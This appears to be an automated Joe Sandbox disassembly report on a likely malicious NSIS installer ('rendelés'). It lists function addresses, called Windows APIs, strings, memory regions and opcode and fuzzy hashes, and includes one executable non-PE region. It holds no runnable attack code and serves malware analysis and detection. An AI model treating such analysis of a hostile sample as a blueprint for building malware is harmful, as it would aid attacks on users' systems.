Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8,004030A8,00422728,00000000,00000000,00000000), ref: 00405725
Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98

Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32(00428200,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(00428200,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID:
API String ID: 2584051700-0
Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Function 00405B99 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,00437800), ref: 00405BDC
GetLastError.KERNEL32 ref: 00405BF0
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
GetLastError.KERNEL32 ref: 00405C0F

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID:
API String ID: 3449924974-0
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99

Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00406098
GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0), ref: 004060A8

Strings

P_B, xrefs: 00406045

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: P_B
API String ID: 3248276644-906794629
Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D

Function 00406536 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,0040A230,00000000,('B,00000000,?,?,00428200,?,?,0040679D,80000002), ref: 0040657C
RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,?,00428200,?,00000000,00422728), ref: 00406587

Strings

('B, xrefs: 0040655B

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CloseQueryValue
String ID: ('B
API String ID: 3356406503-2332581011
Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4

Function 00406187 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004061A5
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,?,0040363E,00437000,00437800,00437800,00437800,00437800,00437800,00437800,00403923), ref: 004061C0

Strings

nsa, xrefs: 00406194

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768

Function 357C5D10 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$]q, xrefs: 357C5F6A
$]q, xrefs: 357C5F76
$]q, xrefs: 357C5FDB
$]q, xrefs: 357C5FCF

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 3d5f70227a9dcc344bd5eefba7ea94147047f551008825e77e2bf8fc77e30b6f
Instruction ID: a2fdad309c5c71259383812843c517f25009eb72c1a97c3ed8ba571292c4fd97
Opcode Fuzzy Hash: 3d5f70227a9dcc344bd5eefba7ea94147047f551008825e77e2bf8fc77e30b6f
Instruction Fuzzy Hash: FDB13934A002188FDB18EFA9C594A9EB7F3FF88344F648569D406AB355DB75DC82CB80

Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45

Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45

Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05

Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45

Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05

Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05

Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Function 357C8600 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$]q, xrefs: 357C87B3
$]q, xrefs: 357C8731
$]q, xrefs: 357C8784
$]q, xrefs: 357C87DC

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: c571f9e88bfe55dff97ca05c60c6c243acd49f31ac45e7d2497d2ade8f6a6a76
Instruction ID: a60f6987ed506465628315092470cbdff56d76175170d14a12faa59e0e3c5d1b
Opcode Fuzzy Hash: c571f9e88bfe55dff97ca05c60c6c243acd49f31ac45e7d2497d2ade8f6a6a76
Instruction Fuzzy Hash: 02519D34A102048FDB15DE68D680A9EB7F3FB85350F1485AAD806BF355DB35D886CB80

Function 357C6128 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

LR]q, xrefs: 357C621B
LR]q, xrefs: 357C626A
$]q, xrefs: 357C61B3
$]q, xrefs: 357C61A7

Memory Dump Source

Source File: 00000002.00000002.3301552932.00000000357C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 357C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_357c0000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q$$]q
API String ID: 0-3527005858
Opcode ID: d86cb78c8114dbb123aa83acb5974a0302b72787fff344f092c33dc4c455f985
Instruction ID: ceaf152d8fef714e6ee0e7fcf73093956e59ea0210a268cb39baac4cf96b4500
Opcode Fuzzy Hash: d86cb78c8114dbb123aa83acb5974a0302b72787fff344f092c33dc4c455f985
Instruction Fuzzy Hash: DA518D307102019FDB18EF68C991A5AB7F6FF89704B1085A9E4069F3A6DB75EC46CB90

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000002.00000002.3278856863.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3278841900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278872247.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278886220.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.3278913333.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
